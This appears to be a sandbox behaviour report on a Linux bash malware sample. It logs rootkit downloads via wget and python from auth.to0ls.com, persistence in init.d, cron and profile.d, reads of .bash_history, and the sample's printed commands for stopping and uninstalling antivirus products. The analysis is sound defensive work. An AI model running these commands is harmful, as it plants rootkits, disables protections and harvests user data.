Source: /bin/bash (PID: 20727) | Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20728) | Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20760) | Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20761) | Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20782) | Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20783) | Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20816) | Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20817)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20830)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20831)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20865)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20866)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20900)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20901)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20933)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20934)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20953)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20954)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20988)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20989)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21000)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21001)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21033)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21034)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21058)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21059)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21072)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21073)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21111)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21112)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21125)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21126)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21165)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21166)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21197)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21198)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21216)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21217)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21229)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21230)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21253)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21254)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21282)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21283)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21313)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21314)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21354)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21355)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21389)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21390)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21420)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21421)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21436)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21437)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21468)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21469)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21489)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21490)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21512)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21513)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21545)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21546)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21582)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21583)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21613)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21614)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21646)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21647)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21669)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21670)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21696)Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21697)Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/sh (PID: 21723)Grep executable: /bin/grep -> grep -v ,
Source: /bin/sh (PID: 21794)Grep executable: /bin/grep -> grep ,
Source: /bin/sh (PID: 21801)Grep executable: /bin/grep -> grep ,
Source: /bin/sh (PID: 21816)Grep executable: /bin/grep -> grep -o [0-9]\\{1,3\\}\\.[0-9]\\{1,3\\}\\.[0-9]\\{1,3\\}\\.[0-9]\\{1,3\\}
Source: /bin/sh (PID: 21832)Grep executable: /bin/grep -> grep -o [0-9]\\{1,3\\}\\.[0-9]\\{1,3\\}\\.[0-9]\\{1,3\\}\\.[0-9]\\{1,3\\}
Source: /bin/sh (PID: 21843)Grep executable: /bin/grep -> grep ssh
Source: /bin/sh (PID: 21845)Grep executable: /bin/grep -> grep -v -
Source: /bin/sh (PID: 21846)Grep executable: /bin/grep -> grep -v /
Source: /bin/sh (PID: 21866)Grep executable: /bin/grep -> grep ssh
Source: /bin/sh (PID: 21868)Grep executable: /bin/grep -> grep -v -
Source: /bin/sh (PID: 21869)Grep executable: /bin/grep -> grep -v /
Source: /bin/sh (PID: 21887)Grep executable: /bin/grep -> grep ssh
Source: /bin/sh (PID: 21889)Grep executable: /bin/grep -> grep -v -
Source: /bin/sh (PID: 21890)Grep executable: /bin/grep -> grep -v /
Source: /bin/sh (PID: 21909)Grep executable: /bin/grep -> grep ssh
Source: /bin/sh (PID: 21911)Grep executable: /bin/grep -> grep -v -
Source: /bin/sh (PID: 21912)Grep executable: /bin/grep -> grep -v /
Source: /bin/sh (PID: 21930)Grep executable: /bin/grep -> grep -v 127.0.0.1
Source: /bin/sh (PID: 21931)Grep executable: /bin/grep -> grep -v localhost
Source: /bin/bash (PID: 22249)Grep executable: /bin/grep -> grep /usr/lib/.../diskmanagerd
Source: /bin/bash (PID: 22250)Grep executable: /bin/grep -> grep -v grep
Source: /bin/bash (PID: 22539)Grep executable: /bin/grep -> grep /etc/cron.hourly/gcc4lef.sh
Source: /bin/bash (PID: 22541)Grep executable: /bin/grep -> grep -v grep
Source: /bin/bash (PID: 22612)Grep executable: /bin/grep -> grep c04dceb4c769b2c8823cbf39f3055e6d
Source: /bin/bash (PID: 22650)Grep executable: /bin/grep -> grep ad593f6a17598bdd12fd3bd0f3b2a925
Source: /bin/bash (PID: 23709)Grep executable: /bin/grep -> grep -ao ver= /tmp/vxbkyxrlq2hly2s
Source: /bin/bash (PID: 23737)Grep executable: /bin/grep -> grep -ao ver= /tmp/vxbkyxrlq2hly2s
Source: /bin/bash (PID: 23764)Grep executable: /bin/grep -> grep -ao ver= /tmp/vxbkyxrlq2hly2s
Source: /bin/bash (PID: 23793)Grep executable: /bin/grep -> grep Content-Length:
Source: /bin/bash (PID: 23796)Grep executable: /bin/grep -> grep Content-Length:
Source: /bin/bash (PID: 23799)Grep executable: /bin/grep -> grep Content-Length:
Source: /bin/bash (PID: 23805)Grep executable: /bin/grep -> grep Content-Length:
Source: /bin/bash (PID: 23819)Grep executable: /bin/grep -> grep Content-Length:
Source: /bin/bash (PID: 23845)Grep executable: /bin/grep -> grep Content-Length:
Source: /bin/bash (PID: 23857)Grep executable: /bin/grep -> grep Content-Length:
Source: /bin/bash (PID: 23868)Grep executable: /bin/grep -> grep Content-Length:
Source: /bin/bash (PID: 23876)Grep executable: /bin/grep -> grep Content-Length:
Source: /bin/bash (PID: 23893)Grep executable: /bin/grep -> grep -ao ver= /tmp/vxbkyxrlq2hly2s
Source: /bin/bash (PID: 23900)Grep executable: /bin/grep -> grep -ao ver=1.0 /tmp/vxbkyxrlq2hly2s
Source: /bin/bash (PID: 23927)Grep executable: /bin/grep -> grep /usr/lib/.../kacpi_notify
Source: /bin/bash (PID: 23948)Grep executable: /bin/grep -> grep /usr/lib/.../kacpi_notify
Source: /bin/bash (PID: 23954)Grep executable: /bin/grep -> grep /usr/lib/.../kacpi_notify
Source: /bin/bash (PID: 23986)Grep executable: /bin/grep -> grep /usr/lib/.../kacpi_notify
Source: /bin/bash (PID: 23989)Grep executable: /bin/grep -> grep /usr/lib/.../kacpi_notify
Source: /bin/bash (PID: 23995)Grep executable: /bin/grep -> grep /usr/lib/.../kacpi_notify
Source: /bin/bash (PID: 24037)Grep executable: /bin/grep -> grep /usr/lib/.../kacpi_notify
Source: /bin/bash (PID: 24045)Grep executable: /bin/grep -> grep /usr/lib/.../kacpi_notify
Source: /bin/bash (PID: 24079)Grep executable: /bin/grep -> grep /usr/lib/.../kacpi_notify
Source: /bin/bash (PID: 24090)Grep executable: /bin/grep -> grep /usr/lib/.../kacpi_notify
Source: /bin/bash (PID: 24119)Grep executable: /bin/grep -> grep /usr/lib/.../kacpi_notify
Source: /bin/bash (PID: 24127)Grep executable: /bin/grep -> grep /usr/lib/.../kacpi_notify
Source: /bin/bash (PID: 24156)Grep executable: /bin/grep -> grep /usr/lib/.../kacpi_notify
Source: /bin/bash (PID: 24174)Grep executable: /bin/grep -> grep /usr/lib/.../kacpi_notify
Source: /bin/bash (PID: 24195)Grep executable: /bin/grep -> grep /usr/lib/.../kacpi_notify
Source: /bin/bash (PID: 24198)Grep executable: /bin/grep -> grep /usr/lib/.../kacpi_notify
Source: /bin/bash (PID: 24212)Grep executable: /bin/grep -> grep /usr/lib/.../kacpi_notify
Executes the "mkdir" command used to create folders
Source: /bin/bash (PID: 19367) Mkdir executable: /bin/mkdir -> mkdir -p /usr/lib/... -m 0777
Source: /bin/bash (PID: 19495) Mkdir executable: /bin/mkdir -> mkdir -p /usr/lib/... -m 0777
Source: /bin/bash (PID: 22550) Mkdir executable: /bin/mkdir -> mkdir -p /tmp/... -m 0777
Source: /tmp/.../install.sh (PID: 23617) Mkdir executable: /bin/mkdir -> mkdir -p /usr/include/... -m 0777
Executes the "nohup" (no hangup) command used to keep a background process from being killed when the terminal closes
Source: /bin/bash (PID: 19422) Nohup executable: /usr/bin/nohup -> nohup /bin/bash diskmanagerd /sbin/init
Source: /bin/bash (PID: 21716) Nohup executable: /usr/bin/nohup -> nohup /tmp/.helpdd
Executes the "ping" command used for connectivity testing via ICMP
Source: /bin/bash (PID: 19340) Ping executable: /bin/ping -> ping auth.to0ls.com -c1
Source: /bin/bash (PID: 19467) Ping executable: /bin/ping -> ping auth.to0ls.com -c1
Executes the "python" command used to interpret Python scripts
Source: /bin/bash (PID: 23739) Python executable: /usr/bin/python -> python -c "import urllib;urllib.urlretrieve('http://auth.to0ls.com/l/ver.txt', '/tmp/vxbkyxrlq2hly2s')"
Executes the "rm" command used to delete files or directories
Source: /bin/bash (PID: 19406) Rm executable: /bin/rm -> rm -f /usr/lib/.../diskmanagerd
Source: /bin/bash (PID: 19418) Rm executable: /bin/rm -> rm -f /tmp/1EC6U55yrZ
Source: /bin/bash (PID: 21703) Rm executable: /bin/rm -> rm -f /tmp/.h
Source: /bin/sh (PID: 21950) Rm executable: /bin/rm -> rm -rf /tmp/.hh
Source: /bin/bash (PID: 22136) Rm executable: /bin/rm -> rm -f /tmp/.helpdd
Source: /bin/bash (PID: 22560) Rm executable: /bin/rm -> rm -f /tmp/.../brootkit.sh
Source: /bin/bash (PID: 22613) Rm executable: /bin/rm -> rm -f /tmp/.../install.sh
Source: /bin/bash (PID: 23682) Rm executable: /bin/rm -> rm -rf /tmp/.../
Source: /bin/bash (PID: 23683) Rm executable: /bin/rm -> rm -f /tmp/vxbkyxrlq2hly2s
Source: /bin/bash (PID: 23710) Rm executable: /bin/rm -> rm -f /tmp/vxbkyxrlq2hly2s
Source: /bin/bash (PID: 23738) Rm executable: /bin/rm -> rm -f /tmp/vxbkyxrlq2hly2s
Source: /bin/bash (PID: 23765) Rm executable: /bin/rm -> rm -f /tmp/vxbkyxrlq2hly2s
Source: /bin/bash (PID: 23914) Rm executable: /bin/rm -> rm -f /tmp/vxbkyxrlq2hly2s
Source: /tmp/.../install.sh (PID: 23645) Rm executable: /bin/rm -> rm -f brootkit.sh
Source: /tmp/.../install.sh (PID: 23648) Rm executable: /bin/rm -> rm -f /tmp/.../install.sh
Executes the "systemctl" command used for controlling the systemd system and service manager
Source: /usr/sbin/update-rc.d (PID: 22389) Systemctl executable: /bin/systemctl -> systemctl daemon-reload
Executes the "touch" command used to create files or modify time stamps
Source: /bin/bash (PID: 23782) Touch executable: /usr/bin/touch -> touch /tmp/vxbkyxrlq2hly2s
Executes the "wget" command typically used for HTTP/S downloading
Source: /bin/bash (PID: 22572) Wget executable: /usr/bin/wget -> wget -O /tmp/.../brootkit.sh http://auth.to0ls.com/l/tiktoor/brootkit.sh
Source: /bin/bash (PID: 22614) Wget executable: /usr/bin/wget -> wget -O /tmp/.../install.sh http://auth.to0ls.com/l/tiktoor/install.sh
Source: /bin/bash (PID: 23684) Wget executable: /usr/bin/wget -> wget -O /tmp/vxbkyxrlq2hly2s http://auth.to0ls.com/l/ver.txt
Sample tries to set the executable flag
Source: /bin/mkdir (PID: 19367) File: /usr/lib/... (bits: - usr: rwx grp: rwx all: rwx)
Source: /bin/chmod (PID: 19368) File: /usr/lib/... (bits: - usr: rwx grp: rwx all: rwx)
Source: /bin/chmod (PID: 19413) File: /usr/lib/.../diskmanagerd (bits: - usr: rx grp: rx all: rwx)
Source: /bin/chmod (PID: 19496) File: /usr/lib/... (bits: - usr: rwx grp: rwx all: rwx)
Source: /bin/chmod (PID: 21709) File: /tmp/.helpdd (bits: - usr: rx grp: rx all: rwx)
Source: /bin/chmod (PID: 22267) File: /etc/init.d/diskmanagerd (bits: - usr: rx grp: rx all: rwx)
Source: /bin/chmod (PID: 22536) File: /etc/cron.hourly/gcc4lef.sh (bits: - usr: rx grp: rx all: rwx)
Source: /bin/mkdir (PID: 22550) File: /tmp/... (bits: - usr: rwx grp: rwx all: rwx)
Source: /bin/chmod (PID: 22554) File: /tmp/... (bits: - usr: rwx grp: rwx all: rwx)
Source: /bin/chmod (PID: 22651) File: /tmp/.../brootkit.sh (bits: - usr: rx grp: rx all: rwx)
Source: /bin/chmod (PID: 22652) File: /tmp/.../install.sh (bits: - usr: rx grp: rx all: rwx)
Source: /bin/mkdir (PID: 23617) File: /usr/include/... (bits: - usr: rwx grp: rwx all: rwx)
Source: /bin/chmod (PID: 23638) File: /usr/include/... (bits: - usr: rwx grp: rwx all: rwx)
Writes shell script file to disk with an unusual file extension
Source: /bin/cp (PID: 19407) Writes shell script file to disk with an unusual file extension: /usr/lib/.../diskmanagerd
Source: /bin/bash (PID: 19422) Writes shell script file to disk with an unusual file extension: /etc/init.d/diskmanagerd
Source: /bin/cp (PID: 22527) Writes shell script file to disk with an unusual file extension: /lib/libterminfo.so
Writes shell script files to disk
Source: /bin/bash (PID: 19422) Shell script file created: /etc/cron.hourly/gcc4lef.sh
Source: /usr/bin/wget (PID: 22572) Shell script file created: /tmp/.../brootkit.sh
Source: /usr/bin/wget (PID: 22614) Shell script file created: /tmp/.../install.sh
Source: /bin/cp (PID: 23621) Shell script file created: /usr/include/.../brootkit.sh
Source: /bin/cp (PID: 23641) Shell script file created: /etc/profile.d/emacs.sh
Executes the "awk" command used to scan for patterns (typically in standard output)
Source: /bin/bash (PID: 19342) Awk executable: /usr/bin/awk -> awk "{ print $3 }"
Source: /bin/bash (PID: 19469) Awk executable: /usr/bin/awk -> awk "{ print $3 }"
Source: /bin/sh (PID: 21724) Awk executable: /usr/bin/awk -> awk "{print $1}"
Source: /bin/sh (PID: 21795) Awk executable: /usr/bin/awk -> awk -F, "{print $1}"
Source: /bin/sh (PID: 21802) Awk executable: /usr/bin/awk -> awk -F, "{print $1}"
Source: /bin/sh (PID: 21844) Awk executable: /usr/bin/awk -> awk "{print $2}"
Source: /bin/sh (PID: 21867) Awk executable: /usr/bin/awk -> awk "{print $3}"
Source: /bin/sh (PID: 21888) Awk executable: /usr/bin/awk -> awk "{print $2}"
Source: /bin/sh (PID: 21910) Awk executable: /usr/bin/awk -> awk "{print $3}"

Hooking and other Techniques for Hiding and Protection:

Drops files in suspicious directories
Source: /bin/bash (PID: 19422) File: /etc/init.d/diskmanagerd
Source: /usr/lib/insserv/insserv (PID: 22367) File: /etc/init.d/.depend.boot
Source: /usr/lib/insserv/insserv (PID: 22367) File: /etc/init.d/.depend.start
Source: /usr/lib/insserv/insserv (PID: 22367) File: /etc/init.d/.depend.stop
Sample deletes itself
Source: /bin/rm (PID: 19418) File: /tmp/1EC6U55yrZ
Source: /bin/rm (PID: 22613) File: /tmp/.../install.sh
Source: /bin/rm (PID: 23648) File: /tmp/.../install.sh

Malware Analysis System Evasion:

Executes the "sleep" command used to delay execution and potentially evade sandboxes
Source: /bin/bash (PID: 21717) Sleep executable: /bin/sleep -> sleep 5
Source: /bin/bash (PID: 22655) Sleep executable: /bin/sleep -> sleep 5
Uses the "uname" system call to query kernel version information (possible evasion)
Source: /bin/bash (PID: 19326) Queries kernel information via 'uname':
Source: /bin/ping (PID: 19340) Queries kernel information via 'uname':
Source: /bin/bash (PID: 19422) Queries kernel information via 'uname':
Source: /bin/ping (PID: 19467) Queries kernel information via 'uname':
Source: /usr/bin/wget (PID: 22572) Queries kernel information via 'uname':
Source: /usr/bin/wget (PID: 22614) Queries kernel information via 'uname':
Source: /usr/bin/wget (PID: 23684) Queries kernel information via 'uname':
Source: /usr/bin/curl (PID: 23711) Queries kernel information via 'uname':
Source: /usr/bin/python (PID: 23739) Queries kernel information via 'uname':
Source: /usr/bin/ssh (PID: 21967) Queries kernel information via 'uname':
Source: /usr/bin/ssh (PID: 21973) Queries kernel information via 'uname':
Source: /usr/bin/ssh (PID: 21982) Queries kernel information via 'uname':
Source: /lib/systemd/system-generators/systemd-gpt-auto-generator (PID: 22426) Queries kernel information via 'uname':
Source: /lib/systemd/system-generators/lvm2-activation-generator (PID: 22427) Queries kernel information via 'uname':
Source: /tmp/.../install.sh (PID: 22654) Queries kernel information via 'uname':

Lowering of HIPS / PFW / Operating System Security Settings:

Sample contains AV-related strings
Source: 1EC6U55yrZ safedog: ServiceNameArray=("safedog" "aegis" "yunsuo" "clamd" "avast" "avgd" "cmdavd" "cmdmgd" "drweb-configd" "drweb-spider-kmod" "esets" "xmirrord")
Source: 1EC6U55yrZ aegis: ServiceNameArray=("safedog" "aegis" "yunsuo" "clamd" "avast" "avgd" "cmdavd" "cmdmgd" "drweb-configd" "drweb-spider-kmod" "esets" "xmirrord")
Source: 1EC6U55yrZ yunsuo: ServiceNameArray=("safedog" "aegis" "yunsuo" "clamd" "avast" "avgd" "cmdavd" "cmdmgd" "drweb-configd" "drweb-spider-kmod" "esets" "xmirrord")
Source: 1EC6U55yrZ clamd: ServiceNameArray=("safedog" "aegis" "yunsuo" "clamd" "avast" "avgd" "cmdavd" "cmdmgd" "drweb-configd" "drweb-spider-kmod" "esets" "xmirrord")
Source: 1EC6U55yrZ avast: ServiceNameArray=("safedog" "aegis" "yunsuo" "clamd" "avast" "avgd" "cmdavd" "cmdmgd" "drweb-configd" "drweb-spider-kmod" "esets" "xmirrord")
Source: 1EC6U55yrZ avgd: ServiceNameArray=("safedog" "aegis" "yunsuo" "clamd" "avast" "avgd" "cmdavd" "cmdmgd" "drweb-configd" "drweb-spider-kmod" "esets" "xmirrord")
Source: 1EC6U55yrZ cmdavd: ServiceNameArray=("safedog" "aegis" "yunsuo" "clamd" "avast" "avgd" "cmdavd" "cmdmgd" "drweb-configd" "drweb-spider-kmod" "esets" "xmirrord")
Source: 1EC6U55yrZ cmdmgd: ServiceNameArray=("safedog" "aegis" "yunsuo" "clamd" "avast" "avgd" "cmdavd" "cmdmgd" "drweb-configd" "drweb-spider-kmod" "esets" "xmirrord")
Source: 1EC6U55yrZ drweb-configd: ServiceNameArray=("safedog" "aegis" "yunsuo" "clamd" "avast" "avgd" "cmdavd" "cmdmgd" "drweb-configd" "drweb-spider-kmod" "esets" "xmirrord")
Source: 1EC6U55yrZ drweb-spider-kmod: ServiceNameArray=("safedog" "aegis" "yunsuo" "clamd" "avast" "avgd" "cmdavd" "cmdmgd" "drweb-configd" "drweb-spider-kmod" "esets" "xmirrord")
Source: 1EC6U55yrZ esets: ServiceNameArray=("safedog" "aegis" "yunsuo" "clamd" "avast" "avgd" "cmdavd" "cmdmgd" "drweb-configd" "drweb-spider-kmod" "esets" "xmirrord")
Source: 1EC6U55yrZ xmirrord: ServiceNameArray=("safedog" "aegis" "yunsuo" "clamd" "avast" "avgd" "cmdavd" "cmdmgd" "drweb-configd" "drweb-spider-kmod" "esets" "xmirrord")
Source: 1EC6U55yrZ safedog: "safedog" )
Source: 1EC6U55yrZ safedog: service safedog stop >/dev/null 2>&1
Source: 1EC6U55yrZ safedog: rm -f /etc/init.d/safedog >/dev/null 2>&1
Source: 1EC6U55yrZ safedog: rm -f /usr/bin/safedog_uninstall >/dev/null 2>&1
Source: 1EC6U55yrZ safedog: rm -rf /usr/bin/safedog >/dev/null 2>&1
Source: 1EC6U55yrZ safedog: rm -rf /etc/safedog >/dev/null 2>&1
Source: 1EC6U55yrZ safedog: rm -rf /etc/safedog/libs/safedog >/dev/null 2>&1
Source: 1EC6U55yrZ safedog: rm -rf /etc/safedog/libs/sdcommon >/dev/null 2>&1
Source: 1EC6U55yrZ safedog: rm -rf /etc/safedog/libs/sdcc >/dev/null 2>&1
Source: 1EC6U55yrZ safedog: rm -rf /etc/safedog/sdcc/bin/sdcc >/dev/null 2>&1
Source: 1EC6U55yrZ safedog: rm -rf /etc/safedog/sdcc/script/runsdcc >/dev/null 2>&1
Source: 1EC6U55yrZ safedog: rm -rf /etc/safedog/sdcc/script/sdccboot >/dev/null 2>&1
Source: 1EC6U55yrZ safedog: rm -rf /etc/safedog/logs/sdcc.log >/dev/null 2>&1
Source: 1EC6U55yrZ safedog: rm -f /etc/safedog/sdcc/script/udboot >/dev/null 2>&1
Source: 1EC6U55yrZ safedog: rm -f /etc/safedog/sdcc/bin/udcenter >/dev/null 2>&1
Source: 1EC6U55yrZ safedog: rm -f /etc/safedog/sdcc/bin/udpro >/dev/null 2>&1
Source: 1EC6U55yrZ safedog: rm -f /etc/safedog/sdcc/bin/sdalarm >/dev/null 2>&1
Source: 1EC6U55yrZ safedog: rm -f /etc/safedog/server/script/sdsetos >/dev/null 2>&1
Source: 1EC6U55yrZ safedog: rm -f /etc/safedog/script/safedog_uninstall >/dev/null 2>&1
Source: 1EC6U55yrZ aegis: "aegis" )
Source: 1EC6U55yrZ aegis: killall -9 aegis_cli >/dev/null 2>&1
Source: 1EC6U55yrZ aegis: killall -9 aegis_update >/dev/null 2>&1
Source: 1EC6U55yrZ aegis: /etc/init.d/aegis stop >/dev/null 2>&1
Source: 1EC6U55yrZ aegis: /etc/init.d/aegis uninstall >/dev/null 2>&1
Source: 1EC6U55yrZ aegis: rm -f /etc/init.d/aegis
Source: 1EC6U55yrZ aegis: rc-update del aegis default 2>/dev/null
Source: 1EC6U55yrZ aegis: rm -f "/etc/runlevels/default/aegis" >/dev/null 2>&1;
Source: 1EC6U55yrZ aegis: rm -f "/etc/rc2.d/S80aegis"
Source: 1EC6U55yrZ aegis: rm -f "/etc/rc3.d/S80aegis"
Source: 1EC6U55yrZ aegis: rm -f "/etc/rc4.d/S80aegis"
Source: 1EC6U55yrZ aegis: rm -f "/etc/rc5.d/S80aegis"
Source: 1EC6U55yrZ aegis: rm -f "/etc/rc.d/rc2.d/S80aegis"
Source: 1EC6U55yrZ aegis: rm -f "/etc/rc.d/rc3.d/S80aegis"
Source: 1EC6U55yrZ aegis: rm -f "/etc/rc.d/rc4.d/S80aegis"
Source: 1EC6U55yrZ aegis: rm -f "/etc/rc.d/rc5.d/S80aegis"
Source: 1EC6U55yrZ aegis: rm -rf /usr/local/aegis/aegis_client
Source: 1EC6U55yrZ aegis: rm -rf /usr/local/aegis/aegis_update
Source: 1EC6U55yrZ aegis: rm -rf /usr/local/aegis/alihids
Source: 1EC6U55yrZ yunsuo: "yunsuo" )
Source: 1EC6U55yrZ yunsuo: service yunsuo stop >/dev/null 2>&1
Source: 1EC6U55yrZ yunsuo: /etc/init.d/yunsuo stop >/dev/null 2>&1
Source: 1EC6U55yrZ yunsuo: rm -f /etc/init.d/yunsuo
Source: 1EC6U55yrZ yunsuo: echo y | /usr/local/yunsuo_agent/uninstall >/dev/null 2>&1
Source: 1EC6U55yrZ clamd: "clamd" )
Source: 1EC6U55yrZ clamd: service clamd stop >/dev/null 2>&1
Source: 1EC6U55yrZ clamd: /etc/init.d/clamd stop >/dev/null 2>&1
Source: 1EC6U55yrZ clamav: yum -y remove clamav * >/dev/null 2>&1
Source: 1EC6U55yrZ clamav: dpkg -remove clamav * >/dev/null 2>&1
Source: 1EC6U55yrZ clamav: dpkg --remove clamav * >/dev/null 2>&1
Source: 1EC6U55yrZ clamav: dpkg -remove `dpkg -l | grep clamav | awk '{print $2}'` >/dev/null 2>&1
Source: 1EC6U55yrZ clamav: dpkg --remove `dpkg -l | grep clamav | awk '{print $2}'` >/dev/null 2>&1
Source: 1EC6U55yrZ avast: "avast" )
Source: 1EC6U55yrZ avast: service avast stop >/dev/null 2>&1
Source: 1EC6U55yrZ avast: /etc/init.d/avast stop >/dev/null 2>&1
Source: 1EC6U55yrZ avast: rpm -e avast >/dev/null 2>&1
Source: 1EC6U55yrZ avast: dpkg -remove avast * >/dev/null 2>&1
Source: 1EC6U55yrZ avast: dpkg --remove avast * >/dev/null 2>&1
Source: 1EC6U55yrZ avast: dpkg -remove `dpkg -l | grep avast | awk '{print $2}'` >/dev/null 2>&1
Source: 1EC6U55yrZ avast: dpkg --remove `dpkg -l | grep avast | awk '{print $2}'` >/dev/null 2>&1
Source: 1EC6U55yrZ avgd: "avgd" )
Source: 1EC6U55yrZ avgd: service avgd stop >/dev/null 2>&1
Source: 1EC6U55yrZ avgd: /etc/init.d/avgd stop >/dev/null 2>&1
Source: 1EC6U55yrZ avgd: rpm -e avgd >/dev/null 2>&1
Source: 1EC6U55yrZ cmdavd: "cmdavd" )
Source: 1EC6U55yrZ cmdavd: service cmdavd stop >/dev/null 2>&1
Source: 1EC6U55yrZ cmdmgd: service cmdmgd stop >/dev/null 2>&1
Source: 1EC6U55yrZ cmdavd: /etc/init.d/cmdavd stop >/dev/null 2>&1
Source: 1EC6U55yrZ cmdmgd: /etc/init.d/cmdmgd stop >/dev/null 2>&1
Source: 1EC6U55yrZ cmdmgd: "cmdmgd" )
Source: 1EC6U55yrZ drweb-configd: "drweb-configd" )
Source: 1EC6U55yrZ drweb-spider-kmod: service drweb-spider-kmod stop >/dev/null 2>&1
Source: 1EC6U55yrZ drweb-configd: service drweb-configd stop >/dev/null 2>&1
Source: 1EC6U55yrZ drweb-spider-kmod: /etc/init.d/drweb-spider-kmod stop >/dev/null 2>&1
Source: 1EC6U55yrZ drweb-configd: /etc/init.d/drweb-configd stop >/dev/null 2>&1
Source: 1EC6U55yrZ drweb-spider-kmod: "drweb-spider-kmod" )
Source: 1EC6U55yrZ esets: "esets" )
Source: 1EC6U55yrZ esets: service esets stop >/dev/null 2>&1
Source: 1EC6U55yrZ esets: /etc/init.d/esets stop >/dev/null 2>&1
Source: 1EC6U55yrZ xmirrord: "xmirrord" )
Source: 1EC6U55yrZ xmirrord: service xmirrord stop >/dev/null 2>&1
Source: 1EC6U55yrZ xmirrord: /etc/init.d/xmirrord stop >/dev/null 2>&1

Stealing of Sensitive Information:

Sample reads from .bash_history
Source: /bin/cat (PID: 21815) File: /root/.bash_history
Source: /bin/cat (PID: 21831) File: /home/user/.bash_history
Source: /bin/cat (PID: 21842) File: /home/user/.bash_history
Source: /bin/cat (PID: 21865) File: /home/user/.bash_history
Source: /bin/cat (PID: 21886) File: /root/.bash_history
Source: /bin/cat (PID: 21908) File: /root/.bash_history


Runtime Messages

Command:bash "/tmp/1EC6U55yrZ"
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
Standard Error:

Behavior Graph

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
Behavior Graph ID: 901718, Sample: 1EC6U55yrZ, Startdate: 02/07/2019, Architecture: LINUX, Score: 100 (graph rendered as an image; only its node labels are recoverable here).
Network nodes: auth.to0ls.com (185.234.218.40, 36876, 36878, 36880, Poland); vpn.to0ls.com (185.234.218.247, 443, Poland); 3 other IPs or domains.
